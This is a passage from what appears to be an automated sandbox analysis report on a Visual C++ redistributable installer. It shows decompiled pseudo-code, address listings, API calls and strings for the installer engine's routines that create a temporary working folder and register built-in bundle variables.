									_t33 =  &_v624;
									__imp__UuidCreate(_t33);
									_t60 = _t33 | 0x00000001;
									__eflags = _t60;
									if(_t60 >= 0) {
										_t35 =  &_v624;
										__imp__StringFromGUID2(_t35,  &_v88, 0x27);
										__eflags = _t35;
										if(_t35 != 0) {
											_push( &_v88);
											_t60 = E00011F20(0x7aa94, L"%ls%ls\\",  &_v608);
											__eflags = _t60;
											if(_t60 >= 0) {
												_t23 =  *0x7aa94; // 0x0
												goto L17;
											} else {
												_push("Failed to append bundle id on to temp path for working folder.");
												goto L19;
											}
										} else {
											_t60 = 0x8007000e;
											E000137D3(_t35, "cache.cpp", 0x475, 0x8007000e);
											_push("Failed to convert working folder guid into string.");
											goto L19;
										}
									} else {
										_push("Failed to create working folder guid.");
										goto L19;
									}
								} else {
									_push("Failed to concat Temp directory on windows path for working folder.");
									goto L19;
								}
							} else {
								_push("Failed to ensure windows path for working folder ended in backslash.");
								goto L19;
							}
						} else {
							_t48 = GetLastError();
							_t67 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
							_t60 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "cache.cpp", 0x460, _t60);
							_push("Failed to get windows path for working folder.");
							L19:
							_push(_t60);
							E0005012F();
						}
					}
				}
				return E0003DE36(_t51, _v8 ^ _t68, _t57, _t59, _t60);
			}


























                                                                          0x000280ae
                                                                          0x000280b7
                                                                          0x000280be
                                                                          0x000280c1
                                                                          0x000280cf
                                                                          0x000280dc
                                                                          0x000280e3
                                                                          0x000280e9
                                                                          0x000280ed
                                                                          0x000280ee
                                                                          0x000280ef
                                                                          0x000280f0
                                                                          0x000280f7
                                                                          0x00028270
                                                                          0x00028279
                                                                          0x0002827b
                                                                          0x0002827d
                                                                          0x0002827f
                                                                          0x00000000
                                                                          0x0002827f
                                                                          0x000280fd
                                                                          0x0002810b
                                                                          0x0002811d
                                                                          0x000281b1
                                                                          0x000281b7
                                                                          0x000281b9
                                                                          0x00000000
                                                                          0x000281bb
                                                                          0x000281bb
                                                                          0x000281ca
                                                                          0x000281cc
                                                                          0x000281d4
                                                                          0x000281d6
                                                                          0x000281e4
                                                                          0x000281e9
                                                                          0x00000000
                                                                          0x000281e9
                                                                          0x00028123
                                                                          0x00028123
                                                                          0x00028132
                                                                          0x00028179
                                                                          0x0002817b
                                                                          0x0002817d
                                                                          0x0002819b
                                                                          0x0002819d
                                                                          0x0002819f
                                                                          0x000281f3
                                                                          0x000281f3
                                                                          0x000281fa
                                                                          0x00028202
                                                                          0x00028202
                                                                          0x00028205
                                                                          0x00028214
                                                                          0x0002821b
                                                                          0x00028221
                                                                          0x00028223
                                                                          0x00028244
                                                                          0x0002825b
                                                                          0x00028260
                                                                          0x00028262
                                                                          0x0002826b
                                                                          0x00000000
                                                                          0x00028264
                                                                          0x00028264
                                                                          0x00000000
                                                                          0x00028264
                                                                          0x00028225
                                                                          0x00028225
                                                                          0x00028235
                                                                          0x0002823a
                                                                          0x00000000
                                                                          0x0002823a
                                                                          0x00028207
                                                                          0x00028207
                                                                          0x00000000
                                                                          0x00028207
                                                                          0x000281a1
                                                                          0x000281a1
                                                                          0x00000000
                                                                          0x000281a1
                                                                          0x0002817f
                                                                          0x0002817f
                                                                          0x00000000
                                                                          0x0002817f
                                                                          0x00028134
                                                                          0x00028134
                                                                          0x00028145
                                                                          0x0002814f
                                                                          0x0002815d
                                                                          0x00028162
                                                                          0x00028284
                                                                          0x00028284
                                                                          0x00028285
                                                                          0x0002828b
                                                                          0x00028132
                                                                          0x0002811d
                                                                          0x0002829e

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00015381), ref: 00028104
                                                                            • Part of subcall function 0005076C: OpenProcessToken.ADVAPI32(?,00000008,?,000152B5,00000000,?,?,?,?,?,?,?,000274AB,00000000), ref: 0005078A
                                                                            • Part of subcall function 0005076C: GetLastError.KERNEL32(?,?,?,?,?,?,?,000274AB,00000000), ref: 00050794
                                                                            • Part of subcall function 0005076C: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,000274AB,00000000), ref: 0005081D
                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 0002812A
                                                                          • GetLastError.KERNEL32 ref: 00028134
                                                                          • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 000281B1
                                                                          • GetLastError.KERNEL32 ref: 000281BB
                                                                          Strings
                                                                          • Failed to get windows path for working folder., xrefs: 00028162
                                                                          • Failed to ensure windows path for working folder ended in backslash., xrefs: 0002817F
                                                                          • %ls%ls\, xrefs: 0002824C
                                                                          • Failed to copy working folder path., xrefs: 0002827F
                                                                          • Failed to create working folder guid., xrefs: 00028207
                                                                          • Failed to convert working folder guid into string., xrefs: 0002823A
                                                                          • Temp\, xrefs: 00028189
                                                                          • cache.cpp, xrefs: 00028158, 000281DF, 00028230
                                                                          • Failed to get temp path for working folder., xrefs: 000281E9
                                                                          • Failed to append bundle id on to temp path for working folder., xrefs: 00028264
                                                                          • Failed to concat Temp directory on windows path for working folder., xrefs: 000281A1
                                                                          • @Met, xrefs: 00028134, 000281BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Process$ChangeCloseCurrentDirectoryFindNotificationOpenPathTempTokenWindows
                                                                          • String ID: %ls%ls\$@Met$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                          • API String ID: 58964441-2272642251
                                                                          • Opcode ID: ff04abeb5dba90d0d4068b9df650a7dc8120f38ffc1c05f1e161a8e94c7b58ad
                                                                          • Instruction ID: 261a5edb449a84e7a54ebb009c13a2ba7d2e192d5bf927548ebcce527bc9318e
                                                                          • Opcode Fuzzy Hash: ff04abeb5dba90d0d4068b9df650a7dc8120f38ffc1c05f1e161a8e94c7b58ad
                                                                          • Instruction Fuzzy Hash: 1841F976F41B34B7EB6096A49C4AFEB73ACAB00711F008155FE05FB180EA759D4887E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00017503 Relevance: 33.4, APIs: 1, Strings: 21, Instructions: 378COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1521 17503-17dc0 InitializeCriticalSection 1522 17dc3-17de0 call 15530 1521->1522 1525 17de2-17de9 1522->1525 1526 17ded-17dfb call 5012f 1522->1526 1525->1522 1527 17deb 1525->1527 1529 17dfe-17e10 call 3de36 1526->1529 1527->1529
                                                                          C-Code - Quality: 100%
                                                                          			E00017503(struct _CRITICAL_SECTION* _a4) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char* _v88;
				intOrPtr _v92;
				char _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char* _v108;
				intOrPtr _v112;
				char _v116;
				char _v120;
				intOrPtr _v124;
				char* _v128;
				intOrPtr _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				char* _v148;
				intOrPtr _v152;
				char _v156;
				char _v160;
				intOrPtr _v164;
				char* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr _v184;
				char* _v188;
				intOrPtr _v192;
				char _v196;
				char _v200;
				intOrPtr _v204;
				char* _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				intOrPtr _v224;
				char* _v228;
				intOrPtr _v232;
				char _v236;
				char _v240;
				intOrPtr _v244;
				char* _v248;
				char _v252;
				char _v256;
				char _v260;
				intOrPtr _v264;
				char* _v268;
				char _v272;
				char _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				char* _v288;
				char _v292;
				char _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				char* _v308;
				char _v312;
				char _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				char* _v328;
				char _v332;
				char _v336;
				char _v340;
				intOrPtr _v344;
				char* _v348;
				char _v352;
				char _v356;
				char _v360;
				intOrPtr _v364;
				char* _v368;
				char _v372;
				char _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				char* _v388;
				char _v392;
				char _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				char* _v408;
				char _v412;
				char _v416;
				char _v420;
				intOrPtr _v424;
				char* _v428;
				char _v432;
				char _v436;
				char _v440;
				intOrPtr _v444;
				char* _v448;
				char _v452;
				char _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				char* _v468;
				char _v472;
				char _v476;
				char _v480;
				intOrPtr _v484;
				char* _v488;
				char _v492;
				char _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				char* _v508;
				char _v512;
				char _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				char* _v528;
				char _v532;
				char _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				char* _v548;
				char _v552;
				char _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				char* _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char* _v588;
				char _v592;
				char _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				char* _v608;
				char _v612;
				char _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				char* _v628;
				char _v632;
				char _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				char* _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				char* _v668;
				char _v672;
				char _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				char* _v688;
				char _v692;
				char _v696;
				char _v700;
				intOrPtr _v704;
				char* _v708;
				char _v712;
				char _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				char* _v728;
				char _v732;
				char _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				char* _v748;
				char _v752;
				char _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				char* _v768;
				char _v772;
				char _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				char* _v788;
				char _v792;
				char _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				char* _v808;
				char _v812;
				char _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				char* _v828;
				char _v832;
				char _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				char* _v848;
				char _v852;
				char _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				char* _v868;
				char _v872;
				char _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				char* _v888;
				char _v892;
				char _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				char* _v908;
				char _v912;
				char _v916;
				char _v920;
				intOrPtr _v924;
				char* _v928;
				char _v932;
				char _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				char* _v948;
				char _v952;
				char _v956;
				char _v960;
				intOrPtr _v964;
				char* _v968;
				char _v972;
				char _v976;
				char _v980;
				intOrPtr _v984;
				char* _v988;
				char _v992;
				char _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				char* _v1008;
				char _v1012;
				char _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				char* _v1028;
				char _v1032;
				char _v1036;
				char _v1040;
				intOrPtr _v1044;
				char* _v1048;
				char _v1052;
				char _v1056;
				char _v1060;
				intOrPtr _v1064;
				char* _v1068;
				char _v1072;
				char _v1076;
				char _v1080;
				intOrPtr _v1084;
				char* _v1088;
				char _v1092;
				char _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				char* _v1108;
				char _v1112;
				char _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				char* _v1128;
				char _v1132;
				char _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				char* _v1148;
				char _v1152;
				char _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				char* _v1168;
				char _v1172;
				char _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				char* _v1188;
				char _v1192;
				char _v1196;
				intOrPtr _v1200;
				intOrPtr _v1204;
				char* _v1208;
				char _v1212;
				char _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				char* _v1228;
				struct _CRITICAL_SECTION* _v1232;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t317;
				struct _CRITICAL_SECTION* _t319;
				intOrPtr _t320;
				intOrPtr _t321;
				intOrPtr _t322;
				void* _t328;
				intOrPtr _t333;
				intOrPtr _t335;
				intOrPtr _t336;
				intOrPtr _t338;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t347;
				char _t348;
				signed int _t349;

				_t317 =  *0x7a008; // 0xfbf51acb
				_v8 = _t317 ^ _t349;
				_t319 = _a4;
				_v1232 = _t319;
				InitializeCriticalSection(_t319);
				_t348 = 0;
				_v1228 = L"AdminToolsFolder";
				_t320 = 0x2b;
				_v1220 = 0x30;
				_v1224 = E00015EAB;
				_v1216 = 0;
				_t335 = 6;
				_v1212 = 0;
				_v1208 = L"AppDataFolder";
				_v1204 = E00015EAB;
				_v1200 = 0x1a;
				_v1196 = 0;
				_v1192 = 0;
				_v1188 = L"CommonAppDataFolder";
				_v1184 = E00015EAB;
				_v1180 = 0x23;
				_v1176 = 0;
				_v1172 = 0;
				_v1168 = L"CommonFiles64Folder";
				_v1164 = E00016418;
				_v1160 = _t320;
				_v1156 = 0;
				_v1152 = 0;
				_v1148 = L"CommonFilesFolder";
				_v1144 = E00015EAB;
				_v1140 = _t320;
				_v1136 = 0;
				_v1132 = 0;
				_v1128 = L"CommonFiles6432Folder";
				_v1124 = E00015D71;
				_v1120 = _t320;
				_v1116 = 0;
				_v1112 = 0;
				_v1108 = L"CompatibilityMode";
				_v1104 = E00016184;
				_v1100 = 0xc;
				_v1096 = 0;
				_v1092 = 0;
				_v1088 = L"Date";
				_v1084 = E00015F14;
				_v1080 = 0;
				_v1076 = 0;
				_v1072 = 0;
				_v1068 = L"ComputerName";
				_v1064 = E00015E0B;
				_v1060 = 0;
				_v1056 = 0;
				_v1052 = 0;
				_v1048 = L"DesktopFolder";
				_v1044 = E00015EAB;
				_v1040 = 0;
				_v1036 = 0;
				_v1032 = 0;
				_v1028 = L"FavoritesFolder";
				_v1024 = E00015EAB;
				_v1020 = _t335;
				_v1016 = 0;
				_v1012 = 0;
				_v1008 = L"FontsFolder";
				_v1004 = E00015EAB;
				_v1000 = 0x14;
				_v996 = 0;
				_v992 = 0;
				_v988 = L"InstallerName";
				_v984 = E0001602F;
				_v980 = 0;
				_v976 = 0;
				_v972 = 0;
				_v968 = L"InstallerVersion";
				_t321 = 5;
				_v944 = E00015EAB;
				_v904 = E00015EAB;
				_t333 = 7;
				_v840 = _t335;
				_t336 = 9;
				_v884 = E00016184;
				_v864 = E00016184;
				_v844 = E00016184;
				_v824 = E00016184;
				_v804 = E00016184;
				_v784 = E00016184;
				_v764 = E00016184;
				_v744 = E00016184;
				_t342 = 0xb;
				_v964 = E0001605C;
				_v960 = 0;
				_v956 = 0;
				_v952 = 0;
				_v948 = L"LocalAppDataFolder";
				_v940 = 0x1c;
				_v936 = 0;
				_v932 = 0;
				_v928 = L"LogonUser";
				_v924 = E000160BA;
				_v920 = 0;
				_v916 = 0;
				_v912 = 0;
				_v908 = L"MyPicturesFolder";
				_v900 = 0x27;
				_v896 = 0;
				_v892 = 0;
				_v888 = L"NTProductType";
				_v880 = 4;
				_v876 = 0;
				_v872 = 0;
				_v868 = L"NTSuiteBackOffice";
				_v860 = _t321;
				_v856 = 0;
				_v852 = 0;
				_v848 = L"NTSuiteDataCenter";
				_v836 = 0;
				_v832 = 0;
				_v828 = L"NTSuiteEnterprise";
				_v820 = E00015EAB;
				_v816 = 0;
				_v812 = 0;
				_v808 = L"NTSuitePersonal";
				_v800 = 8;
				_v796 = 0;
				_v792 = 0;
				_v788 = L"NTSuiteSmallBusiness";
				_v780 = _t336;
				_v776 = 0;
				_v772 = 0;
				_v768 = L"NTSuiteSmallBusinessRestricted";
				_v760 = 0xa;
				_v756 = 0;
				_v752 = 0;
				_v748 = L"NTSuiteWebServer";
				_v740 = E00016184;
				_v736 = 0;
				_v732 = 0;
				_v728 = L"PersonalFolder";
				_v724 = E00015EAB;
				_v720 = _t321;
				_v716 = 0;
				_v712 = 0;
				_v708 = L"Privileged";
				_v704 = E00016360;
				_v700 = 0;
				_v696 = 0;
				_v692 = 0;
				_v688 = L"ProcessorArchitecture";
				_v684 = E000165DF;
				_v680 = 0xe;
				_v676 = 0;
				_t322 = 0x26;
				_v660 = _t322;
				_v640 = _t322;
				_v620 = _t322;
				_v604 = E00015EAB;
				_v564 = E00015EAB;
				_v524 = E00015EAB;
				_v504 = E00015EAB;
				_v520 = _t342;
				_v624 = E00015D71;
				_v560 = _t336;
				_v484 = E000164B6;
				_v464 = E000164B6;
				_t346 = 2;
				_v672 = 0;
				_v668 = L"ProgramFiles64Folder";
				_v664 = E00016418;
				_v656 = 0;
				_v652 = 0;
				_v648 = L"ProgramFilesFolder";
				_v644 = E00015EAB;
				_v636 = 0;
				_v632 = 0;
				_v628 = L"ProgramFiles6432Folder";
				_v616 = 0;
				_v612 = 0;
				_v608 = L"ProgramMenuFolder";
				_v600 = E00015D71;
				_v596 = 0;
				_v592 = 0;
				_v588 = L"RebootPending";
				_v584 = E000163A9;
				_v580 = 0;
				_v576 = 0;
				_v572 = 0;
				_v568 = L"SendToFolder";
				_v556 = 0;
				_v552 = 0;
				_v548 = L"ServicePackLevel";
				_v544 = E000167E5;
				_v540 = 3;
				_v536 = 0;
				_v532 = 0;
				_v528 = L"StartMenuFolder";
				_v516 = 0;
				_v512 = 0;
				_v508 = L"StartupFolder";
				_v500 = _t333;
				_v496 = 0;
				_v492 = 0;
				_v488 = L"SystemFolder";
				_v480 = 0;
				_v476 = 0;
				_v472 = 0;
				_v468 = L"System64Folder";
				_v460 = 1;
				_v456 = 0;
				_v452 = 0;
				_v448 = L"SystemLanguageID";
				_v444 = E00015D0D;
				_v440 = 0;
				_v436 = 0;
				_v432 = 0;
				_v428 = L"TempFolder";
				_v424 = E00016644;
				_v420 = 0;
				_v416 = 0;
				_v412 = 0;
				_v408 = L"TemplateFolder";
				_v404 = E00015EAB;
				_v400 = 0x15;
				_v396 = 0;
				_v392 = 0;
				_v284 = E00015EAB;
				_v324 = E000167E5;
				_v304 = E000167E5;
				_t338 = E0001648B;
				_v244 = E00016159;
				_v164 = E00016159;
				_v144 = E00016159;
				_v388 = L"TerminalServer";
				_v384 = E00016184;
				_v380 = 0xd;
				_v376 = 0;
				_v372 = 0;
				_v368 = L"UserLanguageID";
				_v364 = E00015D3F;
				_v360 = 0;
				_v356 = 0;
				_v352 = 0;
				_v348 = L"VersionMsi";
				_v344 = E0001671C;
				_v340 = 0;
				_v336 = 0;
				_v332 = 0;
				_v328 = L"VersionNT";
				_v320 = 1;
				_v316 = 0;
				_v312 = 0;
				_v308 = L"VersionNT64";
				_v300 = _t346;
				_v296 = 0;
				_v292 = 0;
				_v288 = L"WindowsFolder";
				_v280 = 0x24;
				_v276 = 0;
				_v272 = 0;
				_v268 = L"WindowsVolume";
				_v264 = E000169B8;
				_v260 = 0;
				_v256 = 0;
				_v252 = 0;
				_v248 = L"WixBundleAction";
				_v240 = 0;
				_v236 = 0;
				_v232 = 1;
				_v228 = L"WixBundleExecutePackageCacheFolder";
				_v224 = E0001648B;
				_v220 = 0;
				_v216 = 0;
				_v212 = 1;
				_v208 = L"WixBundleExecutePackageAction";
				_v204 = E0001648B;
				_v200 = 0;
				_v196 = 0;
				_v192 = 1;
				_v188 = L"WixBundleForcedRestartPackage";
				_v184 = E0001648B;
				_v180 = 0;
				_v176 = 1;
				_v172 = 1;
				_v168 = L"WixBundleInstalled";
				_v160 = 0;
				_v156 = 0;
				_v152 = 1;
				_v148 = L"WixBundleElevated";
				_v140 = 0;
				_v136 = 0;
				_v132 = 1;
				_v128 = L"WixBundleActiveParent";
				_v124 = E0001648B;
				_v120 = 0;
				_v116 = 0;
				_v112 = 1;
				_v108 = L"WixBundleProviderKey";
				_v104 = E0001648B;
				_v100 = 0x5b524;
				_v96 = 0;
				_v92 = 1;
				_v88 = L"WixBundleSourceProcessPath";
				_v84 = E0001648B;
				_v80 = 0;
				_v76 = 0;
				_t347 =  &_v1216;
				_v72 = 1;
				_v68 = L"WixBundleSourceProcessFolder";
				_v64 = E0001648B;
				_v60 = 0;
				_v56 = 0;
				_v52 = 1;
				_v48 = L"WixBundleTag";
				_v44 = E0001648B;
				_v40 = 0x5b524;
				_v36 = 0;
				_v32 = 1;
				_v28 = L"WixBundleVersion";
				_v24 = E000166F1;
				_v20 = 0;
				_v16 = 0;
				_v12 = 1;
				while(1) {
					_t328 = E00015530(_t338, _v1232,  *((intOrPtr*)(_t347 - 0xc)),  *((intOrPtr*)(_t347 - 8)),  *((intOrPtr*)(_t347 - 4)),  *_t347,  *((intOrPtr*)(_t347 + 4))); // executed
					_t334 = _t328;
					if(_t328 < 0) {
						break;
					}
					_t348 = _t348 + 1;
					_t347 = _t347 + 0x14;
					if(_t348 < 0x3d) {
						continue;
					} else {
					}
					L5:
					return E0003DE36(_t334, _v8 ^ _t349, 1, _t347, _t348);
				}
				E0005012F(_t334, "Failed to add built-in variable: %ls.",  *((intOrPtr*)(_t347 - 0xc)));
				goto L5;
			}









































































































































































































































































































































                                                                          0x0001750c
                                                                          0x00017513
                                                                          0x00017516
                                                                          0x0001751d
                                                                          0x00017523
                                                                          0x00017529
                                                                          0x0001752b
                                                                          0x00017537
                                                                          0x0001753d
                                                                          0x0001754e
                                                                          0x00017559
                                                                          0x0001755f
                                                                          0x00017560
                                                                          0x00017566
                                                                          0x00017570
                                                                          0x00017576
                                                                          0x00017580
                                                                          0x00017586
                                                                          0x0001758c
                                                                          0x00017596
                                                                          0x0001759c
                                                                          0x000175a6
                                                                          0x000175ac
                                                                          0x000175b2
                                                                          0x000175bc
                                                                          0x000175c6
                                                                          0x000175cc
                                                                          0x000175d2
                                                                          0x000175d8
                                                                          0x000175e2
                                                                          0x000175e8
                                                                          0x000175ee
                                                                          0x000175f4
                                                                          0x000175fa
                                                                          0x00017604
                                                                          0x0001760a
                                                                          0x00017610
                                                                          0x00017616
                                                                          0x0001761c
                                                                          0x00017626
                                                                          0x0001762c
                                                                          0x00017636
                                                                          0x0001763c
                                                                          0x00017642
                                                                          0x0001764c
                                                                          0x00017656
                                                                          0x0001765c
                                                                          0x00017662
                                                                          0x00017668
                                                                          0x00017672
                                                                          0x0001767c
                                                                          0x00017682
                                                                          0x00017688
                                                                          0x0001768e
                                                                          0x00017698
                                                                          0x0001769e
                                                                          0x000176a4
                                                                          0x000176aa
                                                                          0x000176b0
                                                                          0x000176ba
                                                                          0x000176c0
                                                                          0x000176c6
                                                                          0x000176cc
                                                                          0x000176d2
                                                                          0x000176dc
                                                                          0x000176e2
                                                                          0x000176ec
                                                                          0x000176f2
                                                                          0x000176f8
                                                                          0x00017702
                                                                          0x0001770c
                                                                          0x00017712
                                                                          0x00017718
                                                                          0x0001771e
                                                                          0x0001772a
                                                                          0x0001772d
                                                                          0x00017733
                                                                          0x00017739
                                                                          0x0001773c
                                                                          0x00017742
                                                                          0x00017745
                                                                          0x0001774b
                                                                          0x00017751
                                                                          0x00017757
                                                                          0x0001775d
                                                                          0x00017763
                                                                          0x00017769
                                                                          0x0001776f
                                                                          0x00017775
                                                                          0x00017776
                                                                          0x00017780
                                                                          0x00017786
                                                                          0x0001778c
                                                                          0x00017792
                                                                          0x0001779c
                                                                          0x000177a6
                                                                          0x000177ac
                                                                          0x000177b2
                                                                          0x000177bc
                                                                          0x000177c6
                                                                          0x000177cc
                                                                          0x000177d2
                                                                          0x000177d8
                                                                          0x000177e2
                                                                          0x000177ec
                                                                          0x000177f2
                                                                          0x000177f8
                                                                          0x00017802
                                                                          0x0001780c
                                                                          0x00017812
                                                                          0x00017818
                                                                          0x00017822
                                                                          0x00017828
                                                                          0x0001782e
                                                                          0x00017834
                                                                          0x0001783e
                                                                          0x00017844
                                                                          0x0001784a
                                                                          0x00017854
                                                                          0x0001785a
                                                                          0x00017860
                                                                          0x00017866
                                                                          0x00017870
                                                                          0x0001787a
                                                                          0x00017880
                                                                          0x00017886
                                                                          0x00017890
                                                                          0x00017896
                                                                          0x0001789c
                                                                          0x000178a2
                                                                          0x000178ac
                                                                          0x000178b6
                                                                          0x000178bc
                                                                          0x000178c2
                                                                          0x000178cc
                                                                          0x000178d2
                                                                          0x000178d8
                                                                          0x000178de
                                                                          0x000178e8
                                                                          0x000178f2
                                                                          0x000178f8
                                                                          0x000178fe
                                                                          0x00017904
                                                                          0x0001790e
                                                                          0x00017918
                                                                          0x0001791e
                                                                          0x00017924
                                                                          0x0001792a
                                                                          0x00017934
                                                                          0x0001793e
                                                                          0x00017948
                                                                          0x00017950
                                                                          0x00017951
                                                                          0x00017957
                                                                          0x0001795d
                                                                          0x00017968
                                                                          0x0001796e
                                                                          0x00017974
                                                                          0x0001797a
                                                                          0x00017985
                                                                          0x0001798f
                                                                          0x00017996
                                                                          0x000179a1
                                                                          0x000179a7
                                                                          0x000179b2
                                                                          0x000179b3
                                                                          0x000179b9
                                                                          0x000179c3
                                                                          0x000179cd
                                                                          0x000179d3
                                                                          0x000179d9
                                                                          0x000179e3
                                                                          0x000179ed
                                                                          0x000179f3
                                                                          0x000179f9
                                                                          0x00017a03
                                                                          0x00017a09
                                                                          0x00017a0f
                                                                          0x00017a19
                                                                          0x00017a1f
                                                                          0x00017a25
                                                                          0x00017a2b
                                                                          0x00017a35
                                                                          0x00017a3f
                                                                          0x00017a45
                                                                          0x00017a4b
                                                                          0x00017a51
                                                                          0x00017a5b
                                                                          0x00017a61
                                                                          0x00017a67
                                                                          0x00017a71
                                                                          0x00017a77
                                                                          0x00017a81
                                                                          0x00017a87
                                                                          0x00017a8d
                                                                          0x00017a97
                                                                          0x00017a9d
                                                                          0x00017aa3
                                                                          0x00017aad
                                                                          0x00017ab3
                                                                          0x00017ab9
                                                                          0x00017abf
                                                                          0x00017ac9
                                                                          0x00017acf
                                                                          0x00017ad5
                                                                          0x00017adb
                                                                          0x00017ae5
                                                                          0x00017aeb
                                                                          0x00017af1
                                                                          0x00017af7
                                                                          0x00017b01
                                                                          0x00017b0b
                                                                          0x00017b11
                                                                          0x00017b17
                                                                          0x00017b1d
                                                                          0x00017b27
                                                                          0x00017b31
                                                                          0x00017b37
                                                                          0x00017b3d
                                                                          0x00017b43
                                                                          0x00017b4d
                                                                          0x00017b53
                                                                          0x00017b5d
                                                                          0x00017b63
                                                                          0x00017b69
                                                                          0x00017b74
                                                                          0x00017b7a
                                                                          0x00017b80
                                                                          0x00017b85
                                                                          0x00017b8b
                                                                          0x00017b91
                                                                          0x00017b9c
                                                                          0x00017ba6
                                                                          0x00017bb0
                                                                          0x00017bba
                                                                          0x00017bc0
                                                                          0x00017bc6
                                                                          0x00017bd0
                                                                          0x00017bda
                                                                          0x00017be0
                                                                          0x00017be6
                                                                          0x00017bec
                                                                          0x00017bf6
                                                                          0x00017c00
                                                                          0x00017c06
                                                                          0x00017c0c
                                                                          0x00017c12
                                                                          0x00017c1c
                                                                          0x00017c22
                                                                          0x00017c28
                                                                          0x00017c2e
                                                                          0x00017c38
                                                                          0x00017c3e
                                                                          0x00017c44
                                                                          0x00017c4a
                                                                          0x00017c54
                                                                          0x00017c5e
                                                                          0x00017c64
                                                                          0x00017c6a
                                                                          0x00017c74
                                                                          0x00017c7e
                                                                          0x00017c84
                                                                          0x00017c8a
                                                                          0x00017c90
                                                                          0x00017c9a
                                                                          0x00017ca0
                                                                          0x00017ca6
                                                                          0x00017cac
                                                                          0x00017cb6
                                                                          0x00017cbc
                                                                          0x00017cc2
                                                                          0x00017cc8
                                                                          0x00017cce
                                                                          0x00017cd8
                                                                          0x00017cde
                                                                          0x00017ce4
                                                                          0x00017cea
                                                                          0x00017cf0
                                                                          0x00017cfa
                                                                          0x00017d00
                                                                          0x00017d06
                                                                          0x00017d0c
                                                                          0x00017d12
                                                                          0x00017d1c
                                                                          0x00017d22
                                                                          0x00017d28
                                                                          0x00017d2e
                                                                          0x00017d38
                                                                          0x00017d3e
                                                                          0x00017d44
                                                                          0x00017d47
                                                                          0x00017d4e
                                                                          0x00017d51
                                                                          0x00017d54
                                                                          0x00017d57
                                                                          0x00017d5a
                                                                          0x00017d61
                                                                          0x00017d64
                                                                          0x00017d67
                                                                          0x00017d6a
                                                                          0x00017d6d
                                                                          0x00017d74
                                                                          0x00017d77
                                                                          0x00017d7a
                                                                          0x00017d7d
                                                                          0x00017d83
                                                                          0x00017d86
                                                                          0x00017d8d
                                                                          0x00017d90
                                                                          0x00017d93
                                                                          0x00017d96
